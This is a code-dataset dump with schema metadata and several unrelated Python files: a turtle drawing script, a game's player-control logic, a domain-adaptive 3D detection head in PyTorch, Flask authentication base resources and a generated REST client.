blob_id (stringlengths 40–40) | directory_id (stringlengths 40–40) | path (stringlengths 3–616) | content_id (stringlengths 40–40) | detected_licenses (sequencelengths 0–112) | license_type (stringclasses, 2 values) | repo_name (stringlengths 5–115) | snapshot_id (stringlengths 40–40) | revision_id (stringlengths 40–40) | branch_name (stringclasses, 777 values) | visit_date (timestamp[us], 2015-08-06 10:31:46 – 2023-09-06 10:44:38) | revision_date (timestamp[us], 1970-01-01 02:38:32 – 2037-05-03 13:00:00) | committer_date (timestamp[us], 1970-01-01 02:38:32 – 2023-09-06 01:08:06) | github_id (int64, 4.92k–681M, ⌀) | star_events_count (int64, 0–209k) | fork_events_count (int64, 0–110k) | gha_license_id (stringclasses, 22 values) | gha_event_created_at (timestamp[us], 2012-06-04 01:52:49 – 2023-09-14 21:59:50, ⌀) | gha_created_at (timestamp[us], 2008-05-22 07:58:19 – 2023-08-21 12:35:19, ⌀) | gha_language (stringclasses, 149 values) | src_encoding (stringclasses, 26 values) | language (stringclasses, 1 value) | is_vendor (bool, 2 classes) | is_generated (bool, 2 classes) | length_bytes (int64, 3–10.2M) | extension (stringclasses, 188 values) | content (stringlengths 3–10.2M) | authors (sequencelengths 1–1) | author_id (stringlengths 1–132) |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b6e2db285793968bc194f0cc1a2912dc59ad5622 | 8cadb441c5734c6dae2ed47419bd1ce5fac69afa | /13-파이썬기초_내장모듈2.py | bf78b99950cb5a27de4d0b30b38bf211c65a305d | [] | no_license | swj8905/Basic_Course_0904 | cf969a14ececacd369377bc9db611b639a4823a0 | 501620bb185851c3638d3b2029cc8259de67d770 | refs/heads/master | 2023-08-01T04:08:51.134526 | 2021-09-12T04:18:50 | 2021-09-12T04:18:50 | 402,959,383 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 114 | py | import turtle as t
t.shape("turtle")
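# draw an equilateral triangle (three 100-step sides with 120-degree left turns),
# then a circle of radius 50 from the final position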
for i in range(3):
t.forward(100)
t.left(120)
t.circle(50)
t.done() | [
"[email protected]"
] | |
5f67ab5c03e5c44dd8eafab1df10221c656733c3 | 3a60b8935f809e300405214a66d949f0042e7e46 | /src/game/logic/player_control/player_control.py | 01107f77ef3e00a355c7b889bb6556490849130a | [] | no_license | stellarlib/centaurus | e71fe5c98b94e8e575d00e32f55ba39fe71799e6 | 896ae73165f3f44dfb87378ef2635d447ccbccae | refs/heads/master | 2020-08-29T00:02:47.294370 | 2020-07-06T20:06:02 | 2020-07-06T20:06:02 | 217,860,282 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,929 | py | from .standard_control import StandardControl
from .jump_control import JumpControl
from .ranged_control import RangedControl
from .charge_control import ChargeControl
from .action_cost import *
class PlayerControl(object):
STD = 0
RANGED = 1
JUMP = 2
CHARGE = 3
str_to_enum = {
'std': STD,
'ranged': RANGED,
'jump': JUMP,
'charge': CHARGE,
}
action_cost = {
STD: MOVE_COST,
RANGED: RANGED_COST,
JUMP: JUMP_COST,
CHARGE: CHARGE_COST
}
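    # AP (action point) price of entering each mode; switch_mode() refuses a mode
    # the current player cannot afford and rumbles its button instead.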
def __init__(self, logic):
self.game = logic.game
self.logic = logic
cls = PlayerControl
self.mode = cls.STD
self.controls = {
cls.STD: StandardControl(self),
cls.RANGED: RangedControl(self),
cls.JUMP: JumpControl(self),
cls.CHARGE: ChargeControl(self)
}
self._player_turn = True
self._animating = False
@property
def player(self):
return self.logic.player
@property
def active(self):
return self._player_turn and not self._animating
@property
def button_map(self):
return self.game.buttons
#####################
# Routing input #
#################
def switch_mode(self, mode_name):
# this models the panel of buttons where the player toggles between action types
cls = PlayerControl
mode = cls.str_to_enum[mode_name]
if self.mode == mode:
self.mode = cls.STD
#print('switched to standard mode')
self.reset_mode_panel()
else:
cost = cls.action_cost[mode]
if cost > self.player.actions:
#print("can't switch to ", mode_name, " mode - insufficient player actions")
button = self.button_map.get_button_by_id(mode_name)
button.rumble()
else:
self.mode = mode
self.controls[self.mode].init_mode()
# print('switched to ', mode_name, ' mode')
self.reset_mode_panel()
if mode_name != 'std':
button = self.button_map.get_button_by_id(mode_name)
button.button_down()
def reset_mode_panel(self):
[button.button_up() for button in self.button_map.get_button_group('action_mode')]
def handle_click(self, pos):
if self.active:
self.controls[self.mode].handle_click(pos)
def manual_switch_mode(self, mode_name):
if self.active:
self.switch_mode(mode_name)
else:
button = self.button_map.get_button_by_id(mode_name)
button.rumble()
def manual_turn_end(self):
if self.active:
self.rest()
button = self.button_map.get_button_by_id('skip')
button.button_down()
def start_animating(self):
self._animating = True
def end_animating(self):
self._animating = False
##########################################################
# Player controls
####################
def move_player(self, pos):
def resolve_func():
self.spend_action(MOVE_COST)
self.end_animating()
self.start_animating()
self.player.start_move(pos, resolve_func)
def player_exits_level(self, pos):
def resolve_func():
self.end_animating()
self.player.travel_component.travel_to_next_level(pos)
# get next level according to pos
# get the new player pos on that level
# start the new level, put player in new pos
# refresh the turn so it is player start turn, full AP
self.start_animating()
self.player.start_exit_move(pos, resolve_func)
def jump_player(self, pos):
def resolve_func():
self.spend_action(JUMP_COST)
self.end_animating()
self.start_animating()
self.player.start_jump(pos, resolve_func)
def player_jump_attacks(self, pos):
foe = self.logic.get_actor_at(pos)
def resolve_func():
self.player.melee_attack(foe)
self.spend_action(JUMP_COST)
self.end_animating()
self.start_animating()
self.player.start_jump_attack(pos, resolve_func)
def player_attacks(self, pos):
foe = self.logic.get_actor_at(pos)
assert foe != self.player
def resolve_func():
self.spend_action(MELEE_COST)
self.end_animating()
self.start_animating()
self.player.start_melee_attack(foe, resolve_func)
def player_ranged_attacks(self, pos):
foe = self.logic.get_actor_at(pos)
assert foe != self.player
def resolve_func():
self.spend_action(RANGED_COST)
self.end_animating()
self.player.start_ranged_attack(pos, resolve_func)
def charge_player(self, charge_path):
def resolve_func():
self.spend_action(CHARGE_COST)
self.end_animating()
self.start_animating()
self.player.start_charge(charge_path, resolve_func)
###################################################
# Game Logic #
##############
def spend_action(self, x):
self.switch_mode('std')
assert x <= self.player.actions
self.player.spend_actions(x)
if self.player.actions == 0:
self.end_turn()
def start_player_turn(self):
self._player_turn = True
self.set_up_turn()
def set_up_turn(self):
self.player.restore(2)
def tear_down_turn(self):
print('player turn over')
self.logic.start_ai_turn()
def end_turn(self):
self.tear_down_turn()
self._player_turn = False
def rest(self):
self.player.restore(1)
self.end_turn()
| [
"[email protected]"
] | |
5c48292c1a0e15ded45f817f64d7dc0f5106c3a5 | 7dfabdddeb5b8f1628e445cdb6d536958c8bc85b | /pcdet/models/dense_heads/anchor_head_fuse_context_fpn.py | d59a820290723d6120f227037cd95e972f181593 | [
"Apache-2.0"
] | permissive | vehxianfish/SRDAN_Open | d6ba16ebc201c9651fac16bc30f57dc3a740041f | 47c1bd9d2369d8e486b18a7aea220af7324c9011 | refs/heads/master | 2023-08-15T10:36:56.483018 | 2021-09-25T03:35:53 | 2021-09-25T03:35:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,507 | py | import numpy as np
import torch
import torch.nn as nn
from .anchor_head_template import AnchorHeadTemplate
class GradReverse(torch.autograd.Function):
def __init__(self, lambd):
self.lambd = lambd
def forward(self, x):
return x.view_as(x)
def backward(self, grad_output):
return (grad_output * self.lambd)
def grad_reverse(x, lambd):
return GradReverse(lambd)(x)
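# Gradient reversal layer (DANN-style): the forward pass is the identity, while
# the backward pass scales incoming gradients by `lambd` (a negative value flips
# the sign, so minimizing the domain classifier's loss becomes adversarial for
# the feature extractor). Note: this uses the legacy (pre-0.4) torch.autograd
# Function API, where forward/backward are instance methods.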
class AnchorHeadFuseContextFPN(AnchorHeadTemplate):
def __init__(self, model_cfg, input_channels, num_class, class_names, grid_size, point_cloud_range, predict_boxes_when_training=True, nusc=False, input_channels_fpn=None, num_fpn_up=0, num_fpn_downup=0, fpn_layers=[], **kwargs):
super().__init__(
model_cfg=model_cfg, num_class=num_class, class_names=class_names, grid_size=grid_size, point_cloud_range=point_cloud_range,
predict_boxes_when_training=predict_boxes_when_training, nusc=nusc,num_fpn_up=num_fpn_up, num_fpn_downup=num_fpn_downup, fpn_layers=fpn_layers
)
self.num_anchors_per_location = sum(self.num_anchors_per_location)
self.input_channels_fpn = input_channels_fpn
self.context_num = self.num_fpn_up + self.num_fpn_downup
if self.num_fpn_downup > 0:
self.context_num += 1
#256 512
self.context_num += 2 # point context 256*2=512
# print("self.context_num", self.context_num)
###################
if not self.fpn_only:
self.conv_cls = nn.Conv2d(
input_channels+self.context_num*256, self.num_anchors_per_location * self.num_class,
kernel_size=1
)
self.conv_box = nn.Conv2d(
input_channels+self.context_num*256, self.num_anchors_per_location * self.box_coder.code_size,
kernel_size=1
)
######## FPN #########
self.conv_cls_fpn = nn.ModuleDict()
self.conv_box_fpn = nn.ModuleDict()
for layer in self.fpn_layers:
self.num_anchors_per_location_fpn[layer] = sum(self.num_anchors_per_location_fpn[layer]) # 2, 7
self.conv_cls_fpn[layer] = nn.Conv2d(
self.input_channels_fpn[layer]+self.context_num*256, self.num_anchors_per_location_fpn[layer] * self.num_class,
kernel_size=1
)# 512 -> 2
self.conv_box_fpn[layer] = nn.Conv2d(
self.input_channels_fpn[layer]+self.context_num*256, self.num_anchors_per_location_fpn[layer] * self.box_coder.code_size,
kernel_size=1
)# 512 -> 14
######### dir cls #########
if self.model_cfg.get('USE_DIRECTION_CLASSIFIER', None) is not None:
if not self.fpn_only:
self.conv_dir_cls = nn.Conv2d(
input_channels+self.context_num*256,
self.num_anchors_per_location * self.model_cfg.NUM_DIR_BINS,
kernel_size=1
)
self.conv_dir_cls_fpn = nn.ModuleDict()
for layer in self.fpn_layers:
self.conv_dir_cls_fpn[layer] = nn.Conv2d(
self.input_channels_fpn[layer]+self.context_num*256,
self.num_anchors_per_location_fpn[layer] * self.model_cfg.NUM_DIR_BINS,
kernel_size=1
)
else:
self.conv_dir_cls = None
for layer in self.fpn_layers:
self.conv_dir_cls_fpn[layer] = None
self.num_keypoints = 2048#self.model_cfg.NUM_KEYPOINTS
self.point_fc = nn.Sequential(nn.Linear(self.num_keypoints, 512), nn.ReLU(True), nn.Dropout())
# print("USE_DOMAIN_CLASSIFIER", self.model_cfg.get('USE_DOMAIN_CLASSIFIER', None))
if self.model_cfg.get('USE_DOMAIN_CLASSIFIER', None):
if not self.fpn_only:
self.domain_pool = nn.AdaptiveAvgPool2d(1)
self.domain_classifier = nn.Sequential(nn.Linear(input_channels+512, 1024),
nn.ReLU(True), nn.Dropout(),
nn.Linear(1024, 256), nn.ReLU(True),
nn.Dropout(), nn.Linear(256, 1))
self.domain_pool_fpn = nn.ModuleDict()
self.domain_classifier_fpn = nn.ModuleDict()
for layer in self.fpn_layers:
self.domain_pool_fpn[layer] = nn.AdaptiveAvgPool2d(1)
self.domain_classifier_fpn[layer] = nn.Sequential(nn.Linear(self.input_channels_fpn[layer]+512, 1024),
nn.ReLU(True), nn.Dropout(),
nn.Linear(1024, 256), nn.ReLU(True),
nn.Dropout(), nn.Linear(256, 1))
# print(f"self.input_channels_fpn[{layer}]+512", self.input_channels_fpn[layer]+512)
#256
self.init_weights()
def init_weights(self):
pi = 0.01
if not self.fpn_only:
nn.init.constant_(self.conv_cls.bias, -np.log((1 - pi) / pi))
nn.init.normal_(self.conv_box.weight, mean=0, std=0.001)
for layer in self.fpn_layers:
nn.init.constant_(self.conv_cls_fpn[layer].bias, -np.log((1 - pi) / pi))
nn.init.normal_(self.conv_box_fpn[layer].weight, mean=0, std=0.001)
def forward(self, data_dict):
# print("spatial_features_2d", spatial_features_2d.shape) 126
t_mode = data_dict['t_mode']
l = data_dict['l']
if t_mode == 'dom_img_src':
dom_src = True
elif t_mode == 'dom_img_tgt':
dom_src = False
else:
dom_src = None
if 'pseudo' in t_mode:
pseudo = True
else:
pseudo = False
spatial_features_2d = data_dict['spatial_features_2d']
point_features_2d = data_dict['point_features']
# print("spatial_features_2d", spatial_features_2d.shape) # 2,512,126,126
# print("point_features_2d", point_features_2d.shape) # 2,2048
point_features_avg = torch.mean(point_features_2d, -1)
# print("point_features_avg", point_features_avg.shape)
batch_point_features = point_features_avg.view(-1, self.num_keypoints)
x_pool_point = self.point_fc(batch_point_features)
################# DOM #################
if 'dom_img' in t_mode and not self.fpn_only:
x_pool = self.domain_pool(spatial_features_2d).view(spatial_features_2d.size(0), -1)
x_pool_joint = torch.cat((x_pool, x_pool_point),dim=-1)
x_reverse = grad_reverse(x_pool_joint, l*-1)
dom_head_context = self.domain_classifier[:-2](x_reverse).squeeze(-1)
if 'dom_img_det' in t_mode:
data_dict['dom_head_context'] = dom_head_context
dom_img_preds = self.domain_classifier[-2:](dom_head_context).squeeze(-1)
self.forward_ret_dict['dom_img_preds'] = dom_img_preds
if self.training:
targets_dict_dom = self.assign_targets(
gt_boxes=data_dict['gt_boxes'],
dom_src=dom_src,
pseudo=pseudo
)
self.forward_ret_dict.update(targets_dict_dom)
##################### DOM FPN #####################
if self.num_fpn_up + self.num_fpn_downup > 0:
# print("fpn")
for layer in self.fpn_layers:
if 'dom_img' in t_mode:
spatial_features_2d_fpn = data_dict[f'spatial_features_2d_fpn{layer}']
x_pool_fpn = self.domain_pool_fpn[layer](spatial_features_2d_fpn).view(spatial_features_2d_fpn.size(0), -1)
x_pool_joint_fpn = torch.cat((x_pool_fpn, x_pool_point),dim=-1)
x_reverse_fpn = grad_reverse(x_pool_joint_fpn, l*-1)
dom_head_context_fpn = self.domain_classifier_fpn[layer][:-2](x_reverse_fpn).squeeze(-1)
if 'dom_img_det' in t_mode:
data_dict[f'dom_head_context_fpn{layer}'] = dom_head_context_fpn
dom_img_preds_fpn = self.domain_classifier_fpn[layer][-2:](dom_head_context_fpn).squeeze(-1)
self.forward_ret_dict[f'dom_img_preds_fpn{layer}'] = dom_img_preds_fpn
if self.training:
targets_dict_dom = self.assign_targets(
gt_boxes=data_dict['gt_boxes'],
dom_src=dom_src,
pseudo=pseudo,
fpn_layer=layer
)
self.forward_ret_dict.update(targets_dict_dom)
########## CLS ################
if 'dom_img_det' in t_mode:
dom_point_context = data_dict['dom_point_context']
dom_head_context_fpn = []
for layer in self.fpn_layers:
dom_head_context_fpn.append(data_dict[f'dom_head_context_fpn{layer}'])
dom_head_context_all = torch.cat(dom_head_context_fpn, dim=1)
if not self.fpn_only:
dom_head_context = data_dict['dom_head_context']
dom_head_context_all = torch.cat((dom_head_context_all, dom_head_context, dom_point_context), dim=1)
dom_head_context_all_reshape = dom_head_context_all.unsqueeze(-1).unsqueeze(-1).repeat(1,1,spatial_features_2d.shape[-2],spatial_features_2d.shape[-1])
# combine with context
spatial_features_2d_context = torch.cat((spatial_features_2d, dom_head_context_all_reshape), dim=1)
cls_preds = self.conv_cls(spatial_features_2d_context)
box_preds = self.conv_box(spatial_features_2d_context)
cls_preds = cls_preds.permute(0, 2, 3, 1).contiguous() # [N, H, W, C]
box_preds = box_preds.permute(0, 2, 3, 1).contiguous() # [N, H, W, C]
# print("cls_preds", cls_preds.shape) # 126, 126, 2
# print("box_preds", box_preds.shape) # 126, 126, 14
self.forward_ret_dict['cls_preds'] = cls_preds
self.forward_ret_dict['box_preds'] = box_preds
if self.conv_dir_cls is not None:
dir_cls_preds = self.conv_dir_cls(spatial_features_2d_context)
dir_cls_preds = dir_cls_preds.permute(0, 2, 3, 1).contiguous()
self.forward_ret_dict['dir_cls_preds'] = dir_cls_preds
else:
dir_cls_preds = None
if self.training:
if pseudo:
pseudo_weights = data_dict['pseudo_weights']
else:
pseudo_weights = None
targets_dict = self.assign_targets(
gt_boxes=data_dict['gt_boxes'],
pseudo=pseudo,
pseudo_weights=pseudo_weights
)
self.forward_ret_dict.update(targets_dict)
if not self.training or self.predict_boxes_when_training:
batch_cls_preds, batch_box_preds = self.generate_predicted_boxes(
batch_size=data_dict['batch_size'],
cls_preds=cls_preds, box_preds=box_preds, dir_cls_preds=dir_cls_preds
)
data_dict['batch_cls_preds'] = batch_cls_preds
data_dict['batch_box_preds'] = batch_box_preds
data_dict['cls_preds_normalized'] = False
else:
dom_head_context_all = torch.cat((dom_head_context_all, dom_point_context), dim=1)
# print("batch_cls_preds", batch_cls_preds)
# print("batch_box_preds", batch_box_preds)
# print("data_dict", data_dict['batch_cls_preds'])
##################### CLS FPN #####################
if self.num_fpn_up + self.num_fpn_downup > 0:
# print("fpn")
for layer in self.fpn_layers:
spatial_features_2d_fpn = data_dict[f'spatial_features_2d_fpn{layer}']
# combine with context
dom_head_context_all_fpn_reshape = dom_head_context_all.unsqueeze(-1).unsqueeze(-1).repeat(1,1,spatial_features_2d_fpn.shape[-1],spatial_features_2d_fpn.shape[-1])
# combine with context
spatial_features_2d_fpn_context = torch.cat((spatial_features_2d_fpn, dom_head_context_all_fpn_reshape), dim=1)
cls_preds = self.conv_cls_fpn[layer](spatial_features_2d_fpn_context)
box_preds = self.conv_box_fpn[layer](spatial_features_2d_fpn_context)
cls_preds = cls_preds.permute(0, 2, 3, 1).contiguous() # [N, H, W, C]
box_preds = box_preds.permute(0, 2, 3, 1).contiguous() # [N, H, W, C]
# print("cls_preds2", cls_preds.shape) # 1, 252, 252, 2
# print("box_preds2", box_preds.shape) # 1, 252, 252, 14
self.forward_ret_dict[f'cls_preds_fpn{layer}'] = cls_preds
self.forward_ret_dict[f'box_preds_fpn{layer}'] = box_preds
if self.conv_dir_cls_fpn[layer] is not None:
dir_cls_preds = self.conv_dir_cls_fpn[layer](spatial_features_2d_fpn_context)
dir_cls_preds = dir_cls_preds.permute(0, 2, 3, 1).contiguous()
self.forward_ret_dict[f'dir_cls_preds_fpn{layer}'] = dir_cls_preds
else:
dir_cls_preds = None
if self.training:
if pseudo:
pseudo_weights = data_dict['pseudo_weights']
else:
pseudo_weights = None
targets_dict_fpn = self.assign_targets(
gt_boxes=data_dict['gt_boxes'],
pseudo=pseudo,
pseudo_weights=pseudo_weights,
fpn_layer=layer
)
self.forward_ret_dict.update(targets_dict_fpn)
if not self.training or self.predict_boxes_when_training:
batch_cls_preds, batch_box_preds = self.generate_predicted_boxes(
batch_size=data_dict['batch_size'],
cls_preds=cls_preds, box_preds=box_preds, dir_cls_preds=dir_cls_preds,
fpn_layer=layer
)
data_dict[f'batch_cls_preds_fpn{layer}'] = batch_cls_preds
data_dict[f'batch_box_preds_fpn{layer}'] = batch_box_preds
data_dict[f'cls_preds_normalized_fpn{layer}'] = False
# print("data_dict fpn", data_dict[f'batch_cls_preds_fpn{layer}'])
# print("self.forward_ret_dict", self.forward_ret_dict)
return data_dict
| [
"[email protected]"
] | |
884cc588e8613418d6e38335716aadf8320bf7d1 | f1ad2ff0061f67540ae0723a65c6e1238e9ca77f | /brainminer/base/api.py | 9ab5865150d1a9442943b8b3293af060688cb8c7 | [] | no_license | rbrecheisen/brainminer | efb89b0d804196a7875fadd3491a9cb7e6cb0428 | 2f5d7bd53ba4761af1f67fa7bd16e2c6724feb7d | refs/heads/master | 2021-01-20T19:08:42.447425 | 2017-06-22T08:28:57 | 2017-06-22T08:28:57 | 34,522,617 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,737 | py | from flask import g, Response
from flask_restful import Resource, HTTPException, abort
from brainminer.auth.exceptions import (
MissingAuthorizationHeaderException, UserNotFoundException, UserNotActiveException, InvalidPasswordException,
SecretKeyNotFoundException, SecretKeyInvalidException, TokenDecodingFailedException, PermissionDeniedException,
UserNotSuperUserException, UserNotAdminException)
from brainminer.auth.authentication import check_login, check_token
from brainminer.auth.permissions import has_permission, check_permission, check_admin, check_superuser
# ----------------------------------------------------------------------------------------------------------------------
class BaseResource(Resource):
# def dispatch_request(self, *args, **kwargs):
#
# code = 400
#
# try:
# return super(BaseResource, self).dispatch_request(*args, **kwargs)
# except HTTPException as e:
# message = e.data['message']
# code = e.code
# except Exception as e:
# message = e.message
#
# if message is not None:
# print('[ERROR] {}.dispatch_request() {}'.format(self.__class__.__name__, message))
# abort(code, message=message)
@staticmethod
def config():
return g.config
@staticmethod
def db_session():
return g.db_session
@staticmethod
def current_user():
return g.current_user
# ----------------------------------------------------------------------------------------------------------------------
class HtmlResource(BaseResource):
@staticmethod
def output_html(data, code, headers=None):
resp = Response(data, mimetype='text/html', headers=headers)
resp.status_code = code
return resp
# ----------------------------------------------------------------------------------------------------------------------
class LoginProtectedResource(BaseResource):
def dispatch_request(self, *args, **kwargs):
message = None
try:
check_login()
except MissingAuthorizationHeaderException as e:
message = e.message
except UserNotFoundException as e:
message = e.message
except UserNotActiveException as e:
message = e.message
except InvalidPasswordException as e:
message = e.message
if message is not None:
print('[ERROR] LoginProtectedResource.dispatch_request() {}'.format(message))
abort(403, message=message)
return super(LoginProtectedResource, self).dispatch_request(*args, **kwargs)
# ----------------------------------------------------------------------------------------------------------------------
class TokenProtectedResource(BaseResource):
def dispatch_request(self, *args, **kwargs):
message = None
try:
check_token()
except MissingAuthorizationHeaderException as e:
message = e.message
except SecretKeyNotFoundException as e:
message = e.message
except SecretKeyInvalidException as e:
message = e.message
except TokenDecodingFailedException as e:
message = e.message
except UserNotFoundException as e:
message = e.message
except UserNotActiveException as e:
message = e.message
if message is not None:
print('[ERROR] TokenProtectedResource.dispatch_request() {}'.format(message))
abort(403, message=message)
return super(TokenProtectedResource, self).dispatch_request(*args, **kwargs)
# ----------------------------------------------------------------------------------------------------------------------
class PermissionProtectedResource(TokenProtectedResource):
def check_admin(self):
try:
check_superuser(self.current_user())
except UserNotSuperUserException:
try:
check_admin(self.current_user())
except UserNotAdminException as e:
print('[ERROR] {}.check_permission() {}'.format(self.__class__.__name__, e.message))
abort(403, message=e.message)
def check_permission(self, permission):
try:
check_permission(self.current_user(), permission)
except PermissionDeniedException as e:
print('[ERROR] {}.check_permission() {}'.format(self.__class__.__name__, e.message))
abort(403, message=e.message)
def has_permission(self, permission):
return has_permission(self.current_user(), permission)
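# Usage sketch (hypothetical resource; the endpoint and permission string below
# are illustrative, not part of this module):
#
#   class SessionsResource(PermissionProtectedResource):
#       def get(self):
#           self.check_permission('retrieve:sessions')
#           return {'sessions': []}, 200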
| [
"[email protected]"
] | |
b6bcce36c244e1dcbe8b1d8f45d74d97147ca717 | 8a4a4cab76ddf1b19a017c3e5c765caf9a5fe3cc | /swagger_client/rest.py | 25b9436f7d19c7a00f89c6444071a08bfa2dbbb2 | [] | no_license | ibuler/testsdk | fa724ff129e2a6144c05b8330cd4014c8bfb9a58 | 015bc6ca7da64180a2a11756a4e7cce733aca806 | refs/heads/master | 2020-06-23T09:02:50.322517 | 2019-07-25T05:51:26 | 2019-07-25T05:51:26 | 198,577,933 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,160 | py | # coding: utf-8
"""
Jumpserver API Docs
Jumpserver Restful api docs # noqa: E501
OpenAPI spec version: v1
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import io
import json
import logging
import re
import ssl
import certifi
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import urlencode
try:
import urllib3
except ImportError:
raise ImportError('Swagger python client requires urllib3.')
logger = logging.getLogger(__name__)
class RESTResponse(io.IOBase):
def __init__(self, resp):
self.urllib3_response = resp
self.status = resp.status
self.reason = resp.reason
self.data = resp.data
def getheaders(self):
"""Returns a dictionary of the response headers."""
return self.urllib3_response.getheaders()
def getheader(self, name, default=None):
"""Returns a given response header."""
return self.urllib3_response.getheader(name, default)
class RESTClientObject(object):
def __init__(self, configuration, pools_size=4, maxsize=None):
# urllib3.PoolManager will pass all kw parameters to connectionpool
# https://github.com/shazow/urllib3/blob/f9409436f83aeb79fbaf090181cd81b784f1b8ce/urllib3/poolmanager.py#L75 # noqa: E501
# https://github.com/shazow/urllib3/blob/f9409436f83aeb79fbaf090181cd81b784f1b8ce/urllib3/connectionpool.py#L680 # noqa: E501
# maxsize is the number of requests to host that are allowed in parallel # noqa: E501
# Custom SSL certificates and client certificates: http://urllib3.readthedocs.io/en/latest/advanced-usage.html # noqa: E501
# cert_reqs
if configuration.verify_ssl:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
# ca_certs
if configuration.ssl_ca_cert:
ca_certs = configuration.ssl_ca_cert
else:
# if not set certificate file, use Mozilla's root certificates.
ca_certs = certifi.where()
addition_pool_args = {}
if configuration.assert_hostname is not None:
addition_pool_args['assert_hostname'] = configuration.assert_hostname # noqa: E501
if maxsize is None:
if configuration.connection_pool_maxsize is not None:
maxsize = configuration.connection_pool_maxsize
else:
maxsize = 4
# https pool manager
if configuration.proxy:
self.pool_manager = urllib3.ProxyManager(
num_pools=pools_size,
maxsize=maxsize,
cert_reqs=cert_reqs,
ca_certs=ca_certs,
cert_file=configuration.cert_file,
key_file=configuration.key_file,
proxy_url=configuration.proxy,
**addition_pool_args
)
else:
self.pool_manager = urllib3.PoolManager(
num_pools=pools_size,
maxsize=maxsize,
cert_reqs=cert_reqs,
ca_certs=ca_certs,
cert_file=configuration.cert_file,
key_file=configuration.key_file,
**addition_pool_args
)
def request(self, method, url, query_params=None, headers=None,
body=None, post_params=None, _preload_content=True,
_request_timeout=None):
"""Perform requests.
:param method: http request method
:param url: http request url
:param query_params: query parameters in the url
:param headers: http request headers
:param body: request json body, for `application/json`
:param post_params: request post parameters,
`application/x-www-form-urlencoded`
and `multipart/form-data`
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
"""
method = method.upper()
assert method in ['GET', 'HEAD', 'DELETE', 'POST', 'PUT',
'PATCH', 'OPTIONS']
if post_params and body:
raise ValueError(
"body parameter cannot be used with post_params parameter."
)
post_params = post_params or {}
headers = headers or {}
timeout = None
if _request_timeout:
if isinstance(_request_timeout, (int, ) if six.PY3 else (int, long)): # noqa: E501,F821
timeout = urllib3.Timeout(total=_request_timeout)
elif (isinstance(_request_timeout, tuple) and
len(_request_timeout) == 2):
timeout = urllib3.Timeout(
connect=_request_timeout[0], read=_request_timeout[1])
if 'Content-Type' not in headers:
headers['Content-Type'] = 'application/json'
try:
# For `POST`, `PUT`, `PATCH`, `OPTIONS`, `DELETE`
if method in ['POST', 'PUT', 'PATCH', 'OPTIONS', 'DELETE']:
if query_params:
url += '?' + urlencode(query_params)
if re.search('json', headers['Content-Type'], re.IGNORECASE):
request_body = None
if body is not None:
request_body = json.dumps(body)
r = self.pool_manager.request(
method, url,
body=request_body,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
elif headers['Content-Type'] == 'application/x-www-form-urlencoded': # noqa: E501
r = self.pool_manager.request(
method, url,
fields=post_params,
encode_multipart=False,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
elif headers['Content-Type'] == 'multipart/form-data':
# must del headers['Content-Type'], or the correct
# Content-Type which generated by urllib3 will be
# overwritten.
del headers['Content-Type']
r = self.pool_manager.request(
method, url,
fields=post_params,
encode_multipart=True,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
# Pass a `string` parameter directly in the body to support
# other content types than Json when `body` argument is
# provided in serialized form
elif isinstance(body, str):
request_body = body
r = self.pool_manager.request(
method, url,
body=request_body,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
else:
# Cannot generate the request from given parameters
msg = """Cannot prepare a request message for provided
arguments. Please check that your arguments match
declared content type."""
raise ApiException(status=0, reason=msg)
# For `GET`, `HEAD`
else:
r = self.pool_manager.request(method, url,
fields=query_params,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
except urllib3.exceptions.SSLError as e:
msg = "{0}\n{1}".format(type(e).__name__, str(e))
raise ApiException(status=0, reason=msg)
if _preload_content:
r = RESTResponse(r)
# In the python 3, the response.data is bytes.
# we need to decode it to string.
if six.PY3:
r.data = r.data.decode('utf8')
# log response body
logger.debug("response body: %s", r.data)
if not 200 <= r.status <= 299:
raise ApiException(http_resp=r)
return r
def GET(self, url, headers=None, query_params=None, _preload_content=True,
_request_timeout=None):
return self.request("GET", url,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
query_params=query_params)
def HEAD(self, url, headers=None, query_params=None, _preload_content=True,
_request_timeout=None):
return self.request("HEAD", url,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
query_params=query_params)
def OPTIONS(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("OPTIONS", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def DELETE(self, url, headers=None, query_params=None, body=None,
_preload_content=True, _request_timeout=None):
return self.request("DELETE", url,
headers=headers,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def POST(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("POST", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def PUT(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("PUT", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def PATCH(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("PATCH", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
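# Usage sketch (assumes a swagger_client Configuration instance `cfg`; the URL
# and query parameters below are illustrative):
#
#   client = RESTClientObject(cfg)
#   resp = client.GET("http://localhost/api/items", query_params={"page": 1})
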